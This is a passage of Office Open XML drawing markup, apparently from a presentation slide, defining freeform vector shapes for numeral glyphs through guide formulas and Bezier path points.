                <a:gd name="T16" fmla="*/ 17 w 217"/>
                <a:gd name="T17" fmla="*/ 0 h 318"/>
                <a:gd name="T18" fmla="*/ 0 w 217"/>
                <a:gd name="T19" fmla="*/ 20 h 318"/>
                <a:gd name="T20" fmla="*/ 0 w 217"/>
                <a:gd name="T21" fmla="*/ 41 h 318"/>
                <a:gd name="T22" fmla="*/ 17 w 217"/>
                <a:gd name="T23" fmla="*/ 62 h 318"/>
                <a:gd name="T24" fmla="*/ 34 w 217"/>
                <a:gd name="T25" fmla="*/ 38 h 318"/>
                <a:gd name="T26" fmla="*/ 166 w 217"/>
                <a:gd name="T27" fmla="*/ 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318">
                  <a:moveTo>
                    <a:pt x="166" y="38"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="130"/>
                    <a:pt x="62" y="240"/>
                    <a:pt x="62" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="301"/>
                    <a:pt x="62" y="318"/>
                    <a:pt x="80" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="318"/>
                    <a:pt x="97" y="312"/>
                    <a:pt x="97" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="156"/>
                    <a:pt x="176" y="69"/>
                    <a:pt x="206" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216" y="31"/>
                    <a:pt x="217" y="30"/>
                    <a:pt x="217" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="8"/>
                    <a:pt x="205" y="8"/>
                    <a:pt x="197" y="8"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="32" y="8"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="0"/>
                    <a:pt x="21" y="0"/>
                    <a:pt x="17" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="11"/>
                    <a:pt x="0" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="41"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="51"/>
                    <a:pt x="0" y="62"/>
                    <a:pt x="17" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="62"/>
                    <a:pt x="34" y="52"/>
                    <a:pt x="34" y="38"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="166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9" name="Freeform 251">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ABE8982-88E2-41BE-8D65-46ADA28F0ACC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7459664" y="3267075"/>
              <a:ext cx="82550" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 109 w 218"/>
                <a:gd name="T1" fmla="*/ 131 h 316"/>
                <a:gd name="T2" fmla="*/ 42 w 218"/>
                <a:gd name="T3" fmla="*/ 80 h 316"/>
                <a:gd name="T4" fmla="*/ 109 w 218"/>
                <a:gd name="T5" fmla="*/ 31 h 316"/>
                <a:gd name="T6" fmla="*/ 176 w 218"/>
                <a:gd name="T7" fmla="*/ 80 h 316"/>
                <a:gd name="T8" fmla="*/ 109 w 218"/>
                <a:gd name="T9" fmla="*/ 131 h 316"/>
                <a:gd name="T10" fmla="*/ 148 w 218"/>
                <a:gd name="T11" fmla="*/ 146 h 316"/>
                <a:gd name="T12" fmla="*/ 211 w 218"/>
                <a:gd name="T13" fmla="*/ 80 h 316"/>
                <a:gd name="T14" fmla="*/ 109 w 218"/>
                <a:gd name="T15" fmla="*/ 0 h 316"/>
                <a:gd name="T16" fmla="*/ 7 w 218"/>
                <a:gd name="T17" fmla="*/ 80 h 316"/>
                <a:gd name="T18" fmla="*/ 69 w 218"/>
                <a:gd name="T19" fmla="*/ 146 h 316"/>
                <a:gd name="T20" fmla="*/ 0 w 218"/>
                <a:gd name="T21" fmla="*/ 224 h 316"/>
                <a:gd name="T22" fmla="*/ 109 w 218"/>
                <a:gd name="T23" fmla="*/ 316 h 316"/>
                <a:gd name="T24" fmla="*/ 218 w 218"/>
                <a:gd name="T25" fmla="*/ 224 h 316"/>
                <a:gd name="T26" fmla="*/ 148 w 218"/>
                <a:gd name="T27" fmla="*/ 146 h 316"/>
                <a:gd name="T28" fmla="*/ 109 w 218"/>
                <a:gd name="T29" fmla="*/ 285 h 316"/>
                <a:gd name="T30" fmla="*/ 35 w 218"/>
                <a:gd name="T31" fmla="*/ 223 h 316"/>
                <a:gd name="T32" fmla="*/ 109 w 218"/>
                <a:gd name="T33" fmla="*/ 161 h 316"/>
                <a:gd name="T34" fmla="*/ 183 w 218"/>
                <a:gd name="T35" fmla="*/ 223 h 316"/>
                <a:gd name="T36" fmla="*/ 109 w 218"/>
                <a:gd name="T3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16">
                  <a:moveTo>
                    <a:pt x="109" y="131"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="131"/>
                    <a:pt x="42" y="108"/>
                    <a:pt x="42" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="55"/>
                    <a:pt x="69" y="31"/>
                    <a:pt x="109" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="31"/>
                    <a:pt x="176" y="55"/>
                    <a:pt x="176" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="109"/>
                    <a:pt x="145" y="131"/>
                    <a:pt x="109" y="131"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="148" y="146"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="133"/>
                    <a:pt x="211" y="108"/>
                    <a:pt x="211" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="39"/>
                    <a:pt x="168" y="0"/>
                    <a:pt x="109" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="0"/>
                    <a:pt x="7" y="40"/>
                    <a:pt x="7" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="108"/>
                    <a:pt x="30" y="133"/>
                    <a:pt x="69" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="157"/>
                    <a:pt x="0" y="186"/>
                    <a:pt x="0" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="272"/>
                    <a:pt x="46" y="316"/>
                    <a:pt x="109" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="316"/>
                    <a:pt x="218" y="272"/>
                    <a:pt x="218" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="218" y="186"/>
                    <a:pt x="185" y="157"/>
                    <a:pt x="148" y="146"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="109" y="285"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="285"/>
                    <a:pt x="35" y="258"/>
                    <a:pt x="35" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="193"/>
                    <a:pt x="63" y="161"/>
                    <a:pt x="109" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="161"/>
                    <a:pt x="183" y="193"/>
                    <a:pt x="183" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="258"/>
                    <a:pt x="150" y="285"/>
                    <a:pt x="109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0" name="Freeform 252">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1318A0E0-4AD2-49F8-B645-3A2CE29A5B90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7561264" y="3267075"/>
              <a:ext cx="79375" cy="123825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7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5 w 209"/>
                <a:gd name="T33" fmla="*/ 31 h 310"/>
                <a:gd name="T34" fmla="*/ 175 w 209"/>
                <a:gd name="T35" fmla="*/ 97 h 310"/>
                <a:gd name="T36" fmla="*/ 117 w 209"/>
                <a:gd name="T37" fmla="*/ 189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5" y="255"/>
                    <a:pt x="133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8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4" y="46"/>
                    <a:pt x="68" y="31"/>
                    <a:pt x="95" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="31"/>
                    <a:pt x="175" y="54"/>
                    <a:pt x="175" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="132"/>
                    <a:pt x="150" y="161"/>
                    <a:pt x="117" y="189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1" name="Freeform 253">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F10ECA7-A994-4071-AAE5-D7583EBDB6B8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7661276" y="3270250"/>
              <a:ext cx="80963" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 112 w 210"/>
                <a:gd name="T1" fmla="*/ 110 h 310"/>
                <a:gd name="T2" fmla="*/ 52 w 210"/>
                <a:gd name="T3" fmla="*/ 125 h 310"/>
                <a:gd name="T4" fmla="*/ 52 w 210"/>
                <a:gd name="T5" fmla="*/ 30 h 310"/>
                <a:gd name="T6" fmla="*/ 172 w 210"/>
                <a:gd name="T7" fmla="*/ 30 h 310"/>
                <a:gd name="T8" fmla="*/ 192 w 210"/>
                <a:gd name="T9" fmla="*/ 15 h 310"/>
                <a:gd name="T10" fmla="*/ 172 w 210"/>
                <a:gd name="T11" fmla="*/ 0 h 310"/>
                <a:gd name="T12" fmla="*/ 38 w 210"/>
                <a:gd name="T13" fmla="*/ 0 h 310"/>
                <a:gd name="T14" fmla="*/ 18 w 210"/>
                <a:gd name="T15" fmla="*/ 20 h 310"/>
                <a:gd name="T16" fmla="*/ 18 w 210"/>
                <a:gd name="T17" fmla="*/ 153 h 310"/>
                <a:gd name="T18" fmla="*/ 34 w 210"/>
                <a:gd name="T19" fmla="*/ 173 h 310"/>
                <a:gd name="T20" fmla="*/ 49 w 210"/>
                <a:gd name="T21" fmla="*/ 166 h 310"/>
                <a:gd name="T22" fmla="*/ 112 w 210"/>
                <a:gd name="T23" fmla="*/ 141 h 310"/>
                <a:gd name="T24" fmla="*/ 175 w 210"/>
                <a:gd name="T25" fmla="*/ 210 h 310"/>
                <a:gd name="T26" fmla="*/ 98 w 210"/>
                <a:gd name="T27" fmla="*/ 279 h 310"/>
                <a:gd name="T28" fmla="*/ 38 w 210"/>
                <a:gd name="T29" fmla="*/ 248 h 310"/>
                <a:gd name="T30" fmla="*/ 45 w 210"/>
                <a:gd name="T31" fmla="*/ 232 h 310"/>
                <a:gd name="T32" fmla="*/ 23 w 210"/>
                <a:gd name="T33" fmla="*/ 210 h 310"/>
                <a:gd name="T34" fmla="*/ 0 w 210"/>
                <a:gd name="T35" fmla="*/ 234 h 310"/>
                <a:gd name="T36" fmla="*/ 98 w 210"/>
                <a:gd name="T37" fmla="*/ 310 h 310"/>
                <a:gd name="T38" fmla="*/ 210 w 210"/>
                <a:gd name="T39" fmla="*/ 210 h 310"/>
                <a:gd name="T40" fmla="*/ 112 w 210"/>
                <a:gd name="T41" fmla="*/ 1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310">
                  <a:moveTo>
                    <a:pt x="112" y="110"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="110"/>
                    <a:pt x="73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80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2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2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50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1" y="246"/>
                    <a:pt x="45" y="242"/>
                    <a:pt x="45" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="218"/>
                    <a:pt x="33" y="210"/>
                    <a:pt x="23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10" y="265"/>
                    <a:pt x="210" y="210"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="159"/>
                    <a:pt x="171" y="110"/>
                    <a:pt x="11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2" name="Freeform 254">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFF13929-9976-49F0-923F-C6A8998F0221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7761289" y="3267075"/>
              <a:ext cx="80963" cy="123825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7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5 w 209"/>
                <a:gd name="T33" fmla="*/ 31 h 310"/>
                <a:gd name="T34" fmla="*/ 175 w 209"/>
                <a:gd name="T35" fmla="*/ 97 h 310"/>
                <a:gd name="T36" fmla="*/ 117 w 209"/>
                <a:gd name="T37" fmla="*/ 189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5" y="255"/>
                    <a:pt x="133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8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5" y="46"/>
                    <a:pt x="68" y="31"/>
                    <a:pt x="95" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="31"/>
                    <a:pt x="175" y="54"/>
                    <a:pt x="175" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="132"/>
                    <a:pt x="150" y="161"/>
                    <a:pt x="117" y="189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" name="Freeform 255">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8737962E-0639-4A66-9D85-42035191626C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7862889" y="3303588"/>
              <a:ext cx="77788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" name="Freeform 256">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6ACC6D6-3830-4EC2-9943-FDABBA77C4E0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7961314" y="3267075"/>
              <a:ext cx="82550" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 166 w 217"/>
                <a:gd name="T1" fmla="*/ 38 h 318"/>
                <a:gd name="T2" fmla="*/ 63 w 217"/>
                <a:gd name="T3" fmla="*/ 294 h 318"/>
                <a:gd name="T4" fmla="*/ 80 w 217"/>
                <a:gd name="T5" fmla="*/ 318 h 318"/>
                <a:gd name="T6" fmla="*/ 97 w 217"/>
                <a:gd name="T7" fmla="*/ 298 h 318"/>
                <a:gd name="T8" fmla="*/ 206 w 217"/>
                <a:gd name="T9" fmla="*/ 40 h 318"/>
                <a:gd name="T10" fmla="*/ 217 w 217"/>
                <a:gd name="T11" fmla="*/ 23 h 318"/>
                <a:gd name="T12" fmla="*/ 197 w 217"/>
                <a:gd name="T13" fmla="*/ 8 h 318"/>
                <a:gd name="T14" fmla="*/ 33 w 217"/>
                <a:gd name="T15" fmla="*/ 8 h 318"/>
                <a:gd name="T16" fmla="*/ 17 w 217"/>
                <a:gd name="T17" fmla="*/ 0 h 318"/>
                <a:gd name="T18" fmla="*/ 0 w 217"/>
                <a:gd name="T19" fmla="*/ 20 h 318"/>
                <a:gd name="T20" fmla="*/ 0 w 217"/>
                <a:gd name="T21" fmla="*/ 41 h 318"/>
                <a:gd name="T22" fmla="*/ 17 w 217"/>
                <a:gd name="T23" fmla="*/ 62 h 318"/>
                <a:gd name="T24" fmla="*/ 34 w 217"/>
                <a:gd name="T25" fmla="*/ 38 h 318"/>
                <a:gd name="T26" fmla="*/ 166 w 217"/>
                <a:gd name="T27" fmla="*/ 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318">
                  <a:moveTo>
                    <a:pt x="166" y="38"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="130"/>
                    <a:pt x="63" y="240"/>
                    <a:pt x="63" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="301"/>
                    <a:pt x="63" y="318"/>
                    <a:pt x="80" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="318"/>
                    <a:pt x="97" y="312"/>
                    <a:pt x="97" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="156"/>
                    <a:pt x="176" y="69"/>
                    <a:pt x="206" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216" y="31"/>
                    <a:pt x="217" y="30"/>
                    <a:pt x="217" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="8"/>
                    <a:pt x="205" y="8"/>
                    <a:pt x="197" y="8"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="33" y="8"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="21" y="0"/>
                    <a:pt x="17" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="11"/>
                    <a:pt x="0" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="41"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="51"/>
                    <a:pt x="0" y="62"/>
                    <a:pt x="17" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="62"/>
                    <a:pt x="34" y="52"/>
                    <a:pt x="34" y="38"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="166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" name="Freeform 257">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F75C35D-A4B0-4706-A41B-DF7A0071C1BC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8061326" y="3267075"/>
              <a:ext cx="82550" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 109 w 218"/>
                <a:gd name="T1" fmla="*/ 131 h 316"/>
                <a:gd name="T2" fmla="*/ 42 w 218"/>
                <a:gd name="T3" fmla="*/ 80 h 316"/>
                <a:gd name="T4" fmla="*/ 109 w 218"/>
                <a:gd name="T5" fmla="*/ 31 h 316"/>
                <a:gd name="T6" fmla="*/ 176 w 218"/>
                <a:gd name="T7" fmla="*/ 80 h 316"/>
                <a:gd name="T8" fmla="*/ 109 w 218"/>
                <a:gd name="T9" fmla="*/ 131 h 316"/>
                <a:gd name="T10" fmla="*/ 148 w 218"/>
                <a:gd name="T11" fmla="*/ 146 h 316"/>
                <a:gd name="T12" fmla="*/ 211 w 218"/>
                <a:gd name="T13" fmla="*/ 80 h 316"/>
                <a:gd name="T14" fmla="*/ 109 w 218"/>
                <a:gd name="T15" fmla="*/ 0 h 316"/>
                <a:gd name="T16" fmla="*/ 7 w 218"/>
                <a:gd name="T17" fmla="*/ 80 h 316"/>
                <a:gd name="T18" fmla="*/ 70 w 218"/>
                <a:gd name="T19" fmla="*/ 146 h 316"/>
                <a:gd name="T20" fmla="*/ 0 w 218"/>
                <a:gd name="T21" fmla="*/ 224 h 316"/>
                <a:gd name="T22" fmla="*/ 109 w 218"/>
                <a:gd name="T23" fmla="*/ 316 h 316"/>
                <a:gd name="T24" fmla="*/ 218 w 218"/>
                <a:gd name="T25" fmla="*/ 224 h 316"/>
                <a:gd name="T26" fmla="*/ 148 w 218"/>
                <a:gd name="T27" fmla="*/ 146 h 316"/>
                <a:gd name="T28" fmla="*/ 109 w 218"/>
                <a:gd name="T29" fmla="*/ 285 h 316"/>
                <a:gd name="T30" fmla="*/ 35 w 218"/>
                <a:gd name="T31" fmla="*/ 223 h 316"/>
                <a:gd name="T32" fmla="*/ 109 w 218"/>
                <a:gd name="T33" fmla="*/ 161 h 316"/>
                <a:gd name="T34" fmla="*/ 183 w 218"/>
                <a:gd name="T35" fmla="*/ 223 h 316"/>
                <a:gd name="T36" fmla="*/ 109 w 218"/>
                <a:gd name="T3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16">
                  <a:moveTo>
                    <a:pt x="109" y="131"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="131"/>
                    <a:pt x="42" y="108"/>
                    <a:pt x="42" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="55"/>
                    <a:pt x="70" y="31"/>
                    <a:pt x="109" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="31"/>
                    <a:pt x="176" y="55"/>
                    <a:pt x="176" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="109"/>
                    <a:pt x="145" y="131"/>
                    <a:pt x="109" y="131"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="148" y="146"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="133"/>
                    <a:pt x="211" y="108"/>
                    <a:pt x="211" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="39"/>
                    <a:pt x="168" y="0"/>
                    <a:pt x="109" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="0"/>
                    <a:pt x="7" y="40"/>
                    <a:pt x="7" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="108"/>
                    <a:pt x="30" y="133"/>
                    <a:pt x="70" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="157"/>
                    <a:pt x="0" y="186"/>
                    <a:pt x="0" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="272"/>
                    <a:pt x="47" y="316"/>
                    <a:pt x="109" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="316"/>
                    <a:pt x="218" y="272"/>
                    <a:pt x="218" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="218" y="186"/>
                    <a:pt x="185" y="157"/>
                    <a:pt x="148" y="146"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="109" y="285"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="285"/>
                    <a:pt x="35" y="258"/>
                    <a:pt x="35" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="193"/>
                    <a:pt x="64" y="161"/>
                    <a:pt x="109" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="161"/>
                    <a:pt x="183" y="193"/>
                    <a:pt x="183" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="258"/>
                    <a:pt x="150" y="285"/>
                    <a:pt x="109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" name="Freeform 258">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3061ADCA-EBA5-41AF-8E5F-006C08E958A5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8191501" y="3365500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0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49"/>
                    <a:pt x="15" y="62"/>
                    <a:pt x="30" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49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7" name="Freeform 259">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54B67124-29B3-419A-8719-FF60E20BB34F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8262939" y="3267075"/>
              <a:ext cx="80963" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 8 w 210"/>
                <a:gd name="T1" fmla="*/ 281 h 310"/>
                <a:gd name="T2" fmla="*/ 0 w 210"/>
                <a:gd name="T3" fmla="*/ 295 h 310"/>
                <a:gd name="T4" fmla="*/ 21 w 210"/>
                <a:gd name="T5" fmla="*/ 310 h 310"/>
                <a:gd name="T6" fmla="*/ 190 w 210"/>
                <a:gd name="T7" fmla="*/ 310 h 310"/>
                <a:gd name="T8" fmla="*/ 210 w 210"/>
                <a:gd name="T9" fmla="*/ 290 h 310"/>
                <a:gd name="T10" fmla="*/ 210 w 210"/>
                <a:gd name="T11" fmla="*/ 277 h 310"/>
                <a:gd name="T12" fmla="*/ 193 w 210"/>
                <a:gd name="T13" fmla="*/ 257 h 310"/>
                <a:gd name="T14" fmla="*/ 175 w 210"/>
                <a:gd name="T15" fmla="*/ 280 h 310"/>
                <a:gd name="T16" fmla="*/ 57 w 210"/>
                <a:gd name="T17" fmla="*/ 280 h 310"/>
                <a:gd name="T18" fmla="*/ 155 w 210"/>
                <a:gd name="T19" fmla="*/ 197 h 310"/>
                <a:gd name="T20" fmla="*/ 210 w 210"/>
                <a:gd name="T21" fmla="*/ 97 h 310"/>
                <a:gd name="T22" fmla="*/ 99 w 210"/>
                <a:gd name="T23" fmla="*/ 0 h 310"/>
                <a:gd name="T24" fmla="*/ 0 w 210"/>
                <a:gd name="T25" fmla="*/ 83 h 310"/>
                <a:gd name="T26" fmla="*/ 23 w 210"/>
                <a:gd name="T27" fmla="*/ 107 h 310"/>
                <a:gd name="T28" fmla="*/ 45 w 210"/>
                <a:gd name="T29" fmla="*/ 85 h 310"/>
                <a:gd name="T30" fmla="*/ 38 w 210"/>
                <a:gd name="T31" fmla="*/ 69 h 310"/>
                <a:gd name="T32" fmla="*/ 96 w 210"/>
                <a:gd name="T33" fmla="*/ 31 h 310"/>
                <a:gd name="T34" fmla="*/ 175 w 210"/>
                <a:gd name="T35" fmla="*/ 97 h 310"/>
                <a:gd name="T36" fmla="*/ 118 w 210"/>
                <a:gd name="T37" fmla="*/ 189 h 310"/>
                <a:gd name="T38" fmla="*/ 8 w 210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310">
                  <a:moveTo>
                    <a:pt x="8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3" y="310"/>
                    <a:pt x="21" y="310"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="190" y="310"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="310"/>
                    <a:pt x="210" y="306"/>
                    <a:pt x="210" y="290"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="210" y="277"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="268"/>
                    <a:pt x="210" y="257"/>
                    <a:pt x="193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7" y="280"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="255"/>
                    <a:pt x="134" y="217"/>
                    <a:pt x="155" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="169"/>
                    <a:pt x="210" y="137"/>
                    <a:pt x="210" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="38"/>
                    <a:pt x="159" y="0"/>
                    <a:pt x="99" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="0"/>
                    <a:pt x="0" y="41"/>
                    <a:pt x="0" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="102"/>
                    <a:pt x="14" y="107"/>
                    <a:pt x="23" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="107"/>
                    <a:pt x="45" y="99"/>
                    <a:pt x="45" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="79"/>
                    <a:pt x="42" y="72"/>
                    <a:pt x="38" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="46"/>
                    <a:pt x="69" y="31"/>
                    <a:pt x="96" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="31"/>
                    <a:pt x="175" y="54"/>
                    <a:pt x="175" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="132"/>
                    <a:pt x="151" y="161"/>
                    <a:pt x="118" y="189"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8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8" name="Freeform 260">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A87E913-20C8-49F6-B86C-7A0DD8F97D64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8362951" y="3303588"/>
              <a:ext cx="79375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9" name="Freeform 261">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{861ABD8D-8695-4AD4-8891-E2AD4874330D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8461376" y="3267075"/>
              <a:ext cx="84138" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 166 w 218"/>
                <a:gd name="T1" fmla="*/ 38 h 318"/>
                <a:gd name="T2" fmla="*/ 63 w 218"/>
                <a:gd name="T3" fmla="*/ 294 h 318"/>
                <a:gd name="T4" fmla="*/ 81 w 218"/>
                <a:gd name="T5" fmla="*/ 318 h 318"/>
                <a:gd name="T6" fmla="*/ 98 w 218"/>
                <a:gd name="T7" fmla="*/ 298 h 318"/>
                <a:gd name="T8" fmla="*/ 207 w 218"/>
                <a:gd name="T9" fmla="*/ 40 h 318"/>
                <a:gd name="T10" fmla="*/ 218 w 218"/>
                <a:gd name="T11" fmla="*/ 23 h 318"/>
                <a:gd name="T12" fmla="*/ 198 w 218"/>
                <a:gd name="T13" fmla="*/ 8 h 318"/>
